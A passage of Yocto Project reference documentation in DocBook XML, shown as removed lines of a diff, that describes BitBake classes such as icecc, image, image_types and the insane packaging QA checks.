-<section id='ref-classes-gtk-doc'>
-    <title><filename>gtk-doc.bbclass</filename></title>
-
-    <para>
-        The <filename>gtk-doc</filename> class
-        is a helper class to pull in the appropriate
-        <filename>gtk-doc</filename> dependencies and disable
-        <filename>gtk-doc</filename>.
-    </para>
-</section>
-
-<section id='ref-classes-gtk-icon-cache'>
-    <title><filename>gtk-icon-cache.bbclass</filename></title>
-
-    <para>
-        The <filename>gtk-icon-cache</filename> class
-        generates the proper post-install and post-remove (postinst/postrm)
-        scriptlets for packages that use GTK+ and install icons.
-        These scriptlets call <filename>gtk-update-icon-cache</filename> to add
-        the fonts to GTK+'s icon cache.
-        Since the cache files are architecture-specific,
-        <filename>gtk-update-icon-cache</filename> is run using QEMU if the
-        postinst scriptlets need to be run on the build host during image
-        creation.
-    </para>
-</section>
-
-<section id='ref-classes-gtk-immodules-cache'>
-    <title><filename>gtk-immodules-cache.bbclass</filename></title>
-
-    <para>
-        The <filename>gtk-immodules-cache</filename> class
-        generates the proper post-install and post-remove (postinst/postrm)
-        scriptlets for packages that install GTK+ input method modules for
-        virtual keyboards.
-        These scriptlets call <filename>gtk-update-icon-cache</filename> to add
-        the input method modules to the cache.
-        Since the cache files are architecture-specific,
-        <filename>gtk-update-icon-cache</filename> is run using QEMU if the
-        postinst scriptlets need to be run on the build host during image
-        creation.
-    </para>
-
-    <para>
-        If the input method modules being installed are in packages other than
-        the main package, set
-        <link linkend='var-GTKIMMODULES_PACKAGES'><filename>GTKIMMODULES_PACKAGES</filename></link>
-        to specify the packages containing the modules.
-    </para>
-</section>
-
-<section id='ref-classes-gzipnative'>
-    <title><filename>gzipnative.bbclass</filename></title>
-
-    <para>
-        The <filename>gzipnative</filename> class enables the use of
-        different native versions of <filename>gzip</filename>
-        and <filename>pigz</filename> rather than the versions of these tools
-        from the build host.
-    </para>
-</section>
-
-<section id='ref-classes-icecc'>
-    <title><filename>icecc.bbclass</filename></title>
-
-    <para>
-        The <filename>icecc</filename> class supports
-        <ulink url='https://github.com/icecc/icecream'>Icecream</ulink>, which
-        facilitates taking compile jobs and distributing them among remote
-        machines.
-    </para>
-
-    <para>
-        The class stages directories with symlinks from <filename>gcc</filename>
-        and <filename>g++</filename> to <filename>icecc</filename>, for both
-        native and cross compilers.
-        Depending on each configure or compile, the OpenEmbedded build system
-        adds the directories at the head of the <filename>PATH</filename> list
-        and then sets the <filename>ICECC_CXX</filename> and
-        <filename>ICEC_CC</filename> variables, which are the paths to the
-        <filename>g++</filename> and <filename>gcc</filename> compilers,
-        respectively.
-    </para>
-
-    <para>
-        For the cross compiler, the class creates a <filename>tar.gz</filename>
-        file that contains the Yocto Project toolchain and sets
-        <filename>ICECC_VERSION</filename>, which is the version of the
-        cross-compiler used in the cross-development toolchain, accordingly.
-    </para>
-
-    <para>
-        The class handles all three different compile stages
-        (i.e native ,cross-kernel and target) and creates the necessary
-        environment <filename>tar.gz</filename> file to be used by the remote
-        machines.
-        The class also supports SDK generation.
-    </para>
-
-    <para>
-        If <link linkend='var-ICECC_PATH'><filename>ICECC_PATH</filename></link>
-        is not set in your <filename>local.conf</filename> file, then the
-        class tries to locate the <filename>icecc</filename> binary
-        using <filename>which</filename>.
-
-        If
-        <link linkend='var-ICECC_ENV_EXEC'><filename>ICECC_ENV_EXEC</filename></link>
-        is set in your <filename>local.conf</filename> file, the variable should
-        point to the <filename>icecc-create-env</filename> script
-        provided by the user.
-        If you do not point to a user-provided script, the build system
-        uses the default script provided by the recipe
-        <filename>icecc-create-env-native.bb</filename>.
-        <note>
-            This script is a modified version and not the one that comes with
-            <filename>icecc</filename>.
-        </note>
-    </para>
-
-    <para>
-        If you do not want the Icecream distributed compile support to apply
-        to specific recipes or classes, you can effectively "blacklist" them
-        by listing the recipes and classes using the
-        <link linkend='var-ICECC_USER_PACKAGE_BL'><filename>ICECC_USER_PACKAGE_BL</filename></link>
-        and
-        <link linkend='var-ICECC_USER_CLASS_BL'><filename>ICECC_USER_CLASS_BL</filename></link>,
-        variables, respectively, in your <filename>local.conf</filename> file.
-        Doing so causes the OpenEmbedded build system to handle these
-        compilations locally.
-    </para>
-
-    <para>
-        Additionally, you can list recipes using the
-        <link linkend='var-ICECC_USER_PACKAGE_WL'><filename>ICECC_USER_PACKAGE_WL</filename></link>
-        variable in your <filename>local.conf</filename> file to force
-        <filename>icecc</filename> to be enabled for recipes using an empty
-        <link linkend='var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename></link>
-        variable.
-    </para>
-
-    <para>
-        Inheriting the <filename>icecc</filename> class changes all sstate
-        signatures.
-        Consequently, if a development team has a dedicated build system
-        that populates
-        <link linkend='var-SSTATE_MIRRORS'><filename>STATE_MIRRORS</filename></link>
-        and they want to reuse sstate from
-        <filename>STATE_MIRRORS</filename>, then all developers and the
-        build system need to either inherit the <filename>icecc</filename>
-        class or nobody should.
-    </para>
-
-    <para>
-        At the distribution level, you can inherit the
-        <filename>icecc</filename> class to be sure that all builders start
-        with the same sstate signatures.
-        After inheriting the class, you can then disable the feature by setting
-        the
-        <link linkend='var-ICECC_DISABLED'><filename>ICECC_DISABLED</filename></link>
-        variable to "1" as follows:
-        <literallayout class='monospaced'>
-     INHERIT_DISTRO_append = " icecc"
-     ICECC_DISABLED ??= "1"
-        </literallayout>
-        This practice makes sure everyone is using the same signatures but also
-        requires individuals that do want to use Icecream to enable the feature
-        individually as follows in your <filename>local.conf</filename> file:
-        <literallayout class='monospaced'>
-     ICECC_DISABLED = ""
-        </literallayout>
-    </para>
-</section>
-
-<section id='ref-classes-image'>
-    <title><filename>image.bbclass</filename></title>
-
-    <para>
-        The <filename>image</filename> class helps support creating images
-        in different formats.
-        First, the root filesystem is created from packages using
-        one of the <filename>rootfs*.bbclass</filename>
-        files (depending on the package format used) and then one or more image
-        files are created.
-        <itemizedlist>
-            <listitem><para>The
-                <filename><link linkend='var-IMAGE_FSTYPES'>IMAGE_FSTYPES</link></filename>
-                variable controls the types of images to generate.
-                </para></listitem>
-            <listitem><para>The
-                <filename><link linkend='var-IMAGE_INSTALL'>IMAGE_INSTALL</link></filename>
-                variable controls the list of packages to install into the
-                image.</para></listitem>
-        </itemizedlist>
-        For information on customizing images, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#usingpoky-extend-customimage'>Customizing Images</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-        For information on how images are created, see the
-        "<ulink url='&YOCTO_DOCS_OM_URL;#images-dev-environment'>Images</ulink>"
-        section in the Yocto Project Overview and Concpets Manual.
-    </para>
-</section>
-
-<section id='ref-classes-image-buildinfo'>
-    <title><filename>image-buildinfo.bbclass</filename></title>
-
-    <para>
-        The <filename>image-buildinfo</filename> class writes information
-        to the target filesystem on <filename>/etc/build</filename>.
-    </para>
-</section>
-
-<section id='ref-classes-image_types'>
-    <title><filename>image_types.bbclass</filename></title>
-
-    <para>
-        The <filename>image_types</filename> class defines all of the
-        standard image output types that you can enable through the
-        <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
-        variable.
-        You can use this class as a reference on how to add support for
-        custom image output types.
-    </para>
-
-    <para>
-        By default, the
-        <link linkend='ref-classes-image'><filename>image</filename></link>
-        class automatically enables the <filename>image_types</filename> class.
-        The <filename>image</filename> class uses the
-        <filename>IMGCLASSES</filename> variable as follows:
-        <literallayout class='monospaced'>
-     IMGCLASSES = "rootfs_${IMAGE_PKGTYPE} image_types ${IMAGE_CLASSES}"
-     IMGCLASSES += "${@['populate_sdk_base', 'populate_sdk_ext']['linux' in d.getVar("SDK_OS")]}"
-     IMGCLASSES += "${@bb.utils.contains_any('IMAGE_FSTYPES', 'live iso hddimg', 'image-live', '', d)}"
-     IMGCLASSES += "${@bb.utils.contains('IMAGE_FSTYPES', 'container', 'image-container', '', d)}"
-     IMGCLASSES += "image_types_wic"
-     IMGCLASSES += "rootfs-postcommands"
-     IMGCLASSES += "image-postinst-intercepts"
-     inherit ${IMGCLASSES}
-        </literallayout>
-    </para>
-
-    <para>
-        The <filename>image_types</filename> class also handles conversion and
-        compression of images.
-        <note>
-            To build a VMware VMDK image, you need to add "wic.vmdk" to
-            <filename>IMAGE_FSTYPES</filename>.
-            This would also be similar for Virtual Box Virtual Disk Image
-            ("vdi") and QEMU Copy On Write Version 2 ("qcow2") images.
-        </note>
-    </para>
-</section>
-
-<section id='ref-classes-image-live'>
-    <title><filename>image-live.bbclass</filename></title>
-
-    <para>
-        This class controls building "live" (i.e. HDDIMG and ISO) images.
-        Live images contain syslinux for legacy booting, as well as the
-        bootloader specified by
-        <link linkend='var-EFI_PROVIDER'><filename>EFI_PROVIDER</filename></link>
-        if
-        <link linkend='var-MACHINE_FEATURES'><filename>MACHINE_FEATURES</filename></link>
-        contains "efi".
-    </para>
-
-    <para>
-        Normally, you do not use this class directly.
-        Instead, you add "live" to
-        <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>.
-    </para>
-</section>
-
-<section id='ref-classes-image-mklibs'>
-    <title><filename>image-mklibs.bbclass</filename></title>
-
-    <para>
-        The <filename>image-mklibs</filename> class
-        enables the use of the <filename>mklibs</filename> utility during the
-        <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
-        task, which optimizes the size of
-        libraries contained in the image.
-    </para>
-
-    <para>
-        By default, the class is enabled in the
-        <filename>local.conf.template</filename> using the
-        <link linkend='var-USER_CLASSES'><filename>USER_CLASSES</filename></link>
-        variable as follows:
-        <literallayout class='monospaced'>
-     USER_CLASSES ?= "buildstats image-mklibs image-prelink"
-        </literallayout>
-    </para>
-</section>
-
-<section id='ref-classes-image-prelink'>
-    <title><filename>image-prelink.bbclass</filename></title>
-
-    <para>
-        The <filename>image-prelink</filename> class
-        enables the use of the <filename>prelink</filename> utility during
-        the
-        <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
-        task, which optimizes the dynamic
-        linking of shared libraries to reduce executable startup time.
-    </para>
-
-    <para>
-        By default, the class is enabled in the
-        <filename>local.conf.template</filename> using the
-        <link linkend='var-USER_CLASSES'><filename>USER_CLASSES</filename></link>
-        variable as follows:
-        <literallayout class='monospaced'>
-     USER_CLASSES ?= "buildstats image-mklibs image-prelink"
-        </literallayout>
-    </para>
-</section>
-
-<section id='ref-classes-insane'>
-    <title><filename>insane.bbclass</filename></title>
-
-    <para>
-        The <filename>insane</filename> class adds a step to the package
-        generation process so that output quality assurance checks are
-        generated by the OpenEmbedded build system.
-        A range of checks are performed that check the build's output
-        for common problems that show up during runtime.
-        Distribution policy usually dictates whether to include this class.
-    </para>
-
-    <para>
-        You can configure the sanity checks so that specific test failures
-        either raise a warning or an error message.
-        Typically, failures for new tests generate a warning.
-        Subsequent failures for the same test would then generate an error
-        message once the metadata is in a known and good condition.
-        See the
-        "<link linkend='ref-qa-checks'>QA Error and Warning Messages</link>"
-        Chapter for a list of all the warning and error messages
-        you might encounter using a default configuration.
-    </para>
-
-    <para>
-        Use the
-        <link linkend='var-WARN_QA'><filename>WARN_QA</filename></link> and
-        <link linkend='var-ERROR_QA'><filename>ERROR_QA</filename></link>
-        variables to control the behavior of
-        these checks at the global level (i.e. in your custom distro
-        configuration).
-        However, to skip one or more checks in recipes, you should use
-        <link linkend='var-INSANE_SKIP'><filename>INSANE_SKIP</filename></link>.
-        For example, to skip the check for symbolic link
-        <filename>.so</filename> files in the main package of a recipe,
-        add the following to the recipe.
-        You need to realize that the package name override, in this example
-        <filename>${PN}</filename>, must be used:
-        <literallayout class='monospaced'>
-     INSANE_SKIP_${PN} += "dev-so"
-        </literallayout>
-        Please keep in mind that the QA checks exist in order to detect real
-        or potential problems in the packaged output.
-        So exercise caution when disabling these checks.
-    </para>
-
-    <para>
-        The following list shows the tests you can list with the
-        <filename>WARN_QA</filename> and <filename>ERROR_QA</filename>
-        variables:
-        <itemizedlist>
-            <listitem><para><emphasis><filename>already-stripped:</filename></emphasis>
-                Checks that produced binaries have not already been
-                stripped prior to the build system extracting debug symbols.
-                It is common for upstream software projects to default to
-                stripping debug symbols for output binaries.
-                In order for debugging to work on the target using
-                <filename>-dbg</filename> packages, this stripping must be
-                disabled.
-                </para></listitem>
-            <listitem><para><emphasis><filename>arch:</filename></emphasis>
-                Checks the Executable and Linkable Format (ELF) type, bit size,
-                and endianness of any binaries to ensure they match the target
-                architecture.
-                This test fails if any binaries do not match the type since
-                there would be an incompatibility.
-                The test could indicate that the
-                wrong compiler or compiler options have been used.
-                Sometimes software, like bootloaders, might need to bypass
-                this check.
-                </para></listitem>
-            <listitem><para><emphasis><filename>buildpaths:</filename></emphasis>
-                Checks for paths to locations on the build host inside the
-                output files.
-                Currently, this test triggers too many false positives and
-                thus is not normally enabled.
-                </para></listitem>
-            <listitem><para><emphasis><filename>build-deps:</filename></emphasis>
-                Determines if a build-time dependency that is specified through
-                <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>,
-                explicit
-                <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>,
-                or task-level dependencies exists to match any runtime
-                dependency.
-                This determination is particularly useful to discover where
-                runtime dependencies are detected and added during packaging.
-                If no explicit dependency has been specified within the
-                metadata, at the packaging stage it is too late to ensure that
-                the dependency is built, and thus you can end up with an
-                error when the package is installed into the image during the
-                <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
-                task because the auto-detected dependency was not satisfied.
-                An example of this would be where the
-                <link linkend='ref-classes-update-rc.d'><filename>update-rc.d</filename></link>
-                class automatically adds a dependency on the
-                <filename>initscripts-functions</filename> package to packages
-                that install an initscript that refers to
-                <filename>/etc/init.d/functions</filename>.
-                The recipe should really have an explicit
-                <filename>RDEPENDS</filename> for the package in question on
-                <filename>initscripts-functions</filename> so that the
-                OpenEmbedded build system is able to ensure that the
-                <filename>initscripts</filename> recipe is actually built and
-                thus the <filename>initscripts-functions</filename> package is
-                made available.
-                </para></listitem>
-            <listitem><para><emphasis><filename>compile-host-path:</filename></emphasis>
-                Checks the
-                <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
-                log for indications
-                that paths to locations on the build host were used.
-                Using such paths might result in host contamination of the
-                build output.
-                </para></listitem>
-            <listitem><para><emphasis><filename>debug-deps:</filename></emphasis>
-                Checks that all packages except <filename>-dbg</filename>
-                packages do not depend on <filename>-dbg</filename>
-                packages, which would cause a packaging bug.
-                </para></listitem>
-            <listitem><para><emphasis><filename>debug-files:</filename></emphasis>
-                Checks for <filename>.debug</filename> directories in anything but the
-                <filename>-dbg</filename> package.
-                The debug files should all be in the <filename>-dbg</filename> package.
-                Thus, anything packaged elsewhere is incorrect packaging.</para></listitem>
-            <listitem><para><emphasis><filename>dep-cmp:</filename></emphasis>
-                Checks for invalid version comparison statements in runtime
-                dependency relationships between packages (i.e. in
-                <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>,
-                <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>,
-                <link linkend='var-RSUGGESTS'><filename>RSUGGESTS</filename></link>,
-                <link linkend='var-RPROVIDES'><filename>RPROVIDES</filename></link>,
-                <link linkend='var-RREPLACES'><filename>RREPLACES</filename></link>,
-                and
-                <link linkend='var-RCONFLICTS'><filename>RCONFLICTS</filename></link>
-                variable values).
-                Any invalid comparisons might trigger failures or undesirable
-                behavior when passed to the package manager.
-                </para></listitem>
-            <listitem><para><emphasis><filename>desktop:</filename></emphasis>
-                Runs the <filename>desktop-file-validate</filename> program
-                against any <filename>.desktop</filename> files to validate
-                their contents against the specification for
-                <filename>.desktop</filename> files.</para></listitem>
-            <listitem><para><emphasis><filename>dev-deps:</filename></emphasis>
-                Checks that all packages except <filename>-dev</filename>
-                or <filename>-staticdev</filename> packages do not depend on
-                <filename>-dev</filename> packages, which would be a
-                packaging bug.</para></listitem>
-            <listitem><para><emphasis><filename>dev-so:</filename></emphasis>
-                Checks that the <filename>.so</filename> symbolic links are in the
-                <filename>-dev</filename> package and not in any of the other packages.
-                In general, these symlinks are only useful for development purposes.
-                Thus, the <filename>-dev</filename> package is the correct location for
-                them.
-                Some very rare cases do exist for dynamically loaded modules where
-                these symlinks are needed instead in the main package.
-                </para></listitem>
-            <listitem><para><emphasis><filename>file-rdeps:</filename></emphasis>
-                Checks that file-level dependencies identified by the
-                OpenEmbedded build system at packaging time are satisfied.
-                For example, a shell script might start with the line
-                <filename>#!/bin/bash</filename>.
-                This line would translate to a file dependency on
-                <filename>/bin/bash</filename>.
-                Of the three package managers that the OpenEmbedded build
-                system supports, only RPM directly handles file-level
-                dependencies, resolving them automatically to packages
-                providing the files.
-                However, the lack of that functionality in the other two
-                package managers does not mean the dependencies do not still
-                need resolving.
-                This QA check attempts to ensure that explicitly declared
-                <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
-                exist to handle any file-level dependency detected in
-                packaged files.
-                </para></listitem>
-            <listitem><para><emphasis><filename>files-invalid:</filename></emphasis>
-                Checks for
-                <link linkend='var-FILES'><filename>FILES</filename></link>
-                variable values that contain "//", which is invalid.
-                </para></listitem>
-            <listitem><para id='insane-host-user-contaminated'>
-                <emphasis><filename>host-user-contaminated:</filename></emphasis>
-                Checks that no package produced by the recipe contains any
-                files outside of <filename>/home</filename> with a user or
-                group ID that matches the user running BitBake.
-                A match usually indicates that the files are being installed
-                with an incorrect UID/GID, since target IDs are independent
-                from host IDs.
-                For additional information, see the section describing the
-                <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-                task.
-                </para></listitem>
-            <listitem><para><emphasis><filename>incompatible-license:</filename></emphasis>
-                Report when packages are excluded from being created due to
-                being marked with a license that is in
-                <link linkend='var-INCOMPATIBLE_LICENSE'><filename>INCOMPATIBLE_LICENSE</filename></link>.
-                </para></listitem>
-            <listitem><para><emphasis><filename>install-host-path:</filename></emphasis>
-                Checks the
-                <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-                log for indications
-                that paths to locations on the build host were used.
-                Using such paths might result in host contamination of the
-                build output.
-                </para></listitem>
-            <listitem><para><emphasis><filename>installed-vs-shipped:</filename></emphasis>
-                Reports when files have been installed within
-                <filename>do_install</filename> but have not been included in
-                any package by way of the
-                <link linkend='var-FILES'><filename>FILES</filename></link>
-                variable.
-                Files that do not appear in any package cannot be present in
-                an image later on in the build process.
-                Ideally, all installed files should be packaged or not
-                installed at all.
-                These files can be deleted at the end of
-                <filename>do_install</filename> if the files are not
-                needed in any package.
-                </para></listitem>
-            <listitem><para><emphasis><filename>invalid-chars:</filename></emphasis>
-                Checks that the recipe metadata variables
-                <link linkend='var-DESCRIPTION'><filename>DESCRIPTION</filename></link>,
-                <link linkend='var-SUMMARY'><filename>SUMMARY</filename></link>,
-                <link linkend='var-LICENSE'><filename>LICENSE</filename></link>,
-                and
-                <link linkend='var-SECTION'><filename>SECTION</filename></link>
-                do not contain non-UTF-8 characters.
-                Some package managers do not support such characters.
-                </para></listitem>
-            <listitem><para><emphasis><filename>invalid-packageconfig:</filename></emphasis>
-                Checks that no undefined features are being added to
-                <link linkend='var-PACKAGECONFIG'><filename>PACKAGECONFIG</filename></link>.
-                For example, any name "foo" for which the following form
-                does not exist:
-                <literallayout class='monospaced'>
-     PACKAGECONFIG[foo] = "..."
-                </literallayout>
-                </para></listitem>
-            <listitem><para><emphasis><filename>la:</filename></emphasis>
-                Checks <filename>.la</filename> files for any <filename>TMPDIR</filename>
-                paths.
-                Any <filename>.la</filename> file containing these paths is incorrect since
-                <filename>libtool</filename> adds the correct sysroot prefix when using the
-                files automatically itself.</para></listitem>
-            <listitem><para><emphasis><filename>ldflags:</filename></emphasis>
-                Ensures that the binaries were linked with the
-                <link linkend='var-LDFLAGS'><filename>LDFLAGS</filename></link>
-                options provided by the build system.
-                If this test fails, check that the <filename>LDFLAGS</filename> variable
-                is being passed to the linker command.</para></listitem>
-            <listitem><para><emphasis><filename>libdir:</filename></emphasis>
-                Checks for libraries being installed into incorrect
-                (possibly hardcoded) installation paths.
-                For example, this test will catch recipes that install
-                <filename>/lib/bar.so</filename> when
-                <filename>${base_libdir}</filename> is "lib32".
-                Another example is when recipes install
-                <filename>/usr/lib64/foo.so</filename> when
-                <filename>${libdir}</filename> is "/usr/lib".
-                </para></listitem>
-            <listitem><para><emphasis><filename>libexec:</filename></emphasis>
-                Checks if a package contains files in
-                <filename>/usr/libexec</filename>.
-                This check is not performed if the
-                <filename>libexecdir</filename> variable has been set
-                explicitly to <filename>/usr/libexec</filename>.
-                </para></listitem>
-            <listitem><para><emphasis><filename>packages-list:</filename></emphasis>
-                Checks for the same package being listed multiple times through
-                the <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
-                variable value.
-                Installing the package in this manner can cause errors during
-                packaging.
-                </para></listitem>
-            <listitem><para><emphasis><filename>perm-config:</filename></emphasis>
-                Reports lines in <filename>fs-perms.txt</filename> that have
-                an invalid format.
-                </para></listitem>
-            <listitem><para><emphasis><filename>perm-line:</filename></emphasis>
-                Reports lines in <filename>fs-perms.txt</filename> that have
-                an invalid format.
-                </para></listitem>
-            <listitem><para><emphasis><filename>perm-link:</filename></emphasis>
-                Reports lines in <filename>fs-perms.txt</filename> that
-                specify 'link' where the specified target already exists.
-                </para></listitem>
-            <listitem><para><emphasis><filename>perms:</filename></emphasis>
-                Currently, this check is unused but reserved.
-                </para></listitem>
-            <listitem><para><emphasis><filename>pkgconfig:</filename></emphasis>
-                Checks <filename>.pc</filename> files for any
-                <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>/<link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>
-                paths.
-                Any <filename>.pc</filename> file containing these paths is incorrect
-                since <filename>pkg-config</filename> itself adds the correct sysroot prefix
-                when the files are accessed.</para></listitem>
-            <listitem><para><emphasis><filename>pkgname:</filename></emphasis>
-                Checks that all packages in
-                <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
-                have names that do not contain invalid characters (i.e.
-                characters other than 0-9, a-z, ., +, and -).
-                </para></listitem>
-            <listitem><para><emphasis><filename>pkgv-undefined:</filename></emphasis>
-                Checks to see if the <filename>PKGV</filename> variable
-                is undefined during
-                <link linkend='ref-tasks-package'><filename>do_package</filename></link>.
-                </para></listitem>
-            <listitem><para><emphasis><filename>pkgvarcheck:</filename></emphasis>
-                Checks through the variables
-                <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>,
-                <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>,
-                <link linkend='var-RSUGGESTS'><filename>RSUGGESTS</filename></link>,
-                <link linkend='var-RCONFLICTS'><filename>RCONFLICTS</filename></link>,
-                <link linkend='var-RPROVIDES'><filename>RPROVIDES</filename></link>,
-                <link linkend='var-RREPLACES'><filename>RREPLACES</filename></link>,
-                <link linkend='var-FILES'><filename>FILES</filename></link>,
-                <link linkend='var-ALLOW_EMPTY'><filename>ALLOW_EMPTY</filename></link>,
-                <filename>pkg_preinst</filename>,
-                <filename>pkg_postinst</filename>,
-                <filename>pkg_prerm</filename>
-                and <filename>pkg_postrm</filename>, and reports if there are
-                variable sets that are not package-specific.
-                Using these variables without a package suffix is bad practice,
-                and might unnecessarily complicate dependencies of other packages
-                within the same recipe or have other unintended consequences.
-                </para></listitem>
-            <listitem><para><emphasis><filename>pn-overrides:</filename></emphasis>
-                Checks that a recipe does not have a name
-                (<link linkend='var-PN'><filename>PN</filename></link>) value
-                that appears in
-                <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>.
-                If a recipe is named such that its <filename>PN</filename>
-                value matches something already in
-                <filename>OVERRIDES</filename> (e.g. <filename>PN</filename>
-                happens to be the same as
-                <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
-                or
-                <link linkend='var-DISTRO'><filename>DISTRO</filename></link>),
-                it can have unexpected consequences.
-                For example, assignments such as
-                <filename>FILES_${PN} = "xyz"</filename> effectively turn into
-                <filename>FILES = "xyz"</filename>.
-                </para></listitem>
-           <listitem><para><emphasis><filename>rpaths:</filename></emphasis>
-                Checks for rpaths in the binaries that contain build system paths such
-                as <filename>TMPDIR</filename>.
-                If this test fails, bad <filename>-rpath</filename> options are being
-                passed to the linker commands and your binaries have potential security
-                issues.</para></listitem>
-            <listitem><para><emphasis><filename>split-strip:</filename></emphasis>
-                Reports that splitting or stripping debug symbols from binaries
-                has failed.
-                </para></listitem>
-            <listitem><para><emphasis><filename>staticdev:</filename></emphasis>
-                Checks for static library files (<filename>*.a</filename>) in
-                non-<filename>staticdev</filename> packages.
-                </para></listitem>
-            <listitem><para><emphasis><filename>symlink-to-sysroot:</filename></emphasis>
-                Checks for symlinks in packages that point into
-                <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
-                on the host.
-                Such symlinks will work on the host, but are clearly invalid
-                when running on the target.
-                </para></listitem>
-            <listitem><para><emphasis><filename>textrel:</filename></emphasis>
-                Checks for ELF binaries that contain relocations in their
-                <filename>.text</filename> sections, which can result in a
-                performance impact at runtime.
-                See the explanation for the
-                <link linkend='qa-issue-textrel'><filename>ELF binary</filename></link>
-                message for more information regarding runtime performance issues.
-                </para></listitem>
-<!--
-This check was removed for YP 2.3 release
-
-            <listitem><para><emphasis><filename>unsafe-references-in-binaries:</filename></emphasis>
-                Reports when a binary installed in
-                <filename>${base_libdir}</filename>,
-                <filename>${base_bindir}</filename>, or
-                <filename>${base_sbindir}</filename>, depends on another
-                binary installed under <filename>${exec_prefix}</filename>.
-                This dependency is a concern if you want the system to remain
-                basically operable if <filename>/usr</filename> is mounted
-                separately and is not mounted.
-                <note>
-                    Defaults for binaries installed in
-                    <filename>${base_libdir}</filename>,
-                    <filename>${base_bindir}</filename>, and
-                    <filename>${base_sbindir}</filename> are
-                    <filename>/lib</filename>, <filename>/bin</filename>, and
-                    <filename>/sbin</filename>, respectively.
-                    The default for a binary installed
-                    under <filename>${exec_prefix}</filename> is
-                    <filename>/usr</filename>.
-                </note>
-                </para></listitem>
--->
-            <listitem><para><emphasis><filename>useless-rpaths:</filename></emphasis>
-                Checks for dynamic library load paths (rpaths) in the binaries that
-                by default on a standard system are searched by the linker (e.g.
-                <filename>/lib</filename> and <filename>/usr/lib</filename>).
-                While these paths will not cause any breakage, they do waste space and
-                are unnecessary.</para></listitem>
-            <listitem><para><emphasis><filename>var-undefined:</filename></emphasis>
-                Reports when variables fundamental to packaging (i.e.
-                <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>,
-                <link linkend='var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></link>,
-                <link linkend='var-D'><filename>D</filename></link>,
-                <link linkend='var-PN'><filename>PN</filename></link>, and
-                <link linkend='var-PKGD'><filename>PKGD</filename></link>) are
-                undefined during
-                <link linkend='ref-tasks-package'><filename>do_package</filename></link>.
-                </para></listitem>
-            <listitem><para><emphasis><filename>version-going-backwards:</filename></emphasis>
-                If Build History is enabled, reports when a package
-                being written out has a lower version than the previously
-                written package under the same name.
-                If you are placing output packages into a feed and
-                upgrading packages on a target system using that feed, the
-                version of a package going backwards can result in the target
-                system not correctly upgrading to the "new" version of the
-                package.
-                <note>
-                    If you are not using runtime package management on your
-                    target system, then you do not need to worry about
-                    this situation.
-                </note>
-                </para></listitem>
-            <listitem><para><emphasis><filename>xorg-driver-abi:</filename></emphasis>
-                Checks that all packages containing Xorg drivers have ABI
-                dependencies.
-                The <filename>xserver-xorg</filename> recipe provides driver
-                ABI names.
-                All drivers should depend on the ABI versions that they have
-                been built against.
-                Driver recipes that include
-                <filename>xorg-driver-input.inc</filename>
-                or <filename>xorg-driver-video.inc</filename> will
-                automatically get these versions.
-                Consequently, you should only need to explicitly add
-                dependencies to binary driver recipes.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-</section>
-
-<section id='ref-classes-insserv'>
-    <title><filename>insserv.bbclass</filename></title>
-
-    <para>
-        The <filename>insserv</filename> class
-        uses the <filename>insserv</filename> utility to update the order of
-        symbolic links in <filename>/etc/rc?.d/</filename> within an image
-        based on dependencies specified by LSB headers in the
-        <filename>init.d</filename> scripts themselves.
-    </para>
-</section>
-
-<section id='ref-classes-kernel'>
-    <title><filename>kernel.bbclass</filename></title>
-
-    <para>
-        The <filename>kernel</filename> class handles building Linux kernels.
-        The class contains code to build all kernel trees.
-        All needed headers are staged into the
-        <filename><link linkend='var-STAGING_KERNEL_DIR'>STAGING_KERNEL_DIR</link></filename>
-        directory to allow out-of-tree module builds using
-        the
-        <link linkend='ref-classes-module'><filename>module</filename></link>
-        class.
-    </para>
-
-    <para>
-        This means that each built kernel module is packaged separately and
-        inter-module dependencies are created by parsing the
-        <filename>modinfo</filename> output.
-        If all modules are required, then installing the
-        <filename>kernel-modules</filename> package installs all packages with
-        modules and various other kernel packages such as
-        <filename>kernel-vmlinux</filename>.
-    </para>
-
-    <para>
-        The <filename>kernel</filename> class contains logic that allows
-        you to embed an initial RAM filesystem (initramfs) image when
-        you build the kernel image.
-        For information on how to build an initramfs, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#building-an-initramfs-image'>Building an Initial RAM Filesystem (initramfs) Image</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-
-    <para>
-        Various other classes are used by the <filename>kernel</filename>
-        and <filename>module</filename> classes internally including the
-        <link linkend='ref-classes-kernel-arch'><filename>kernel-arch</filename></link>,
-        <link linkend='ref-classes-module-base'><filename>module-base</filename></link>,
-        and
-        <link linkend='ref-classes-linux-kernel-base'><filename>linux-kernel-base</filename></link>
-        classes.
-    </para>
-</section>
-
-<section id='ref-classes-kernel-arch'>
-    <title><filename>kernel-arch.bbclass</filename></title>
-
-    <para>
-        The <filename>kernel-arch</filename> class
-        sets the <filename>ARCH</filename> environment variable for Linux
-        kernel compilation (including modules).
-    </para>
-</section>
-
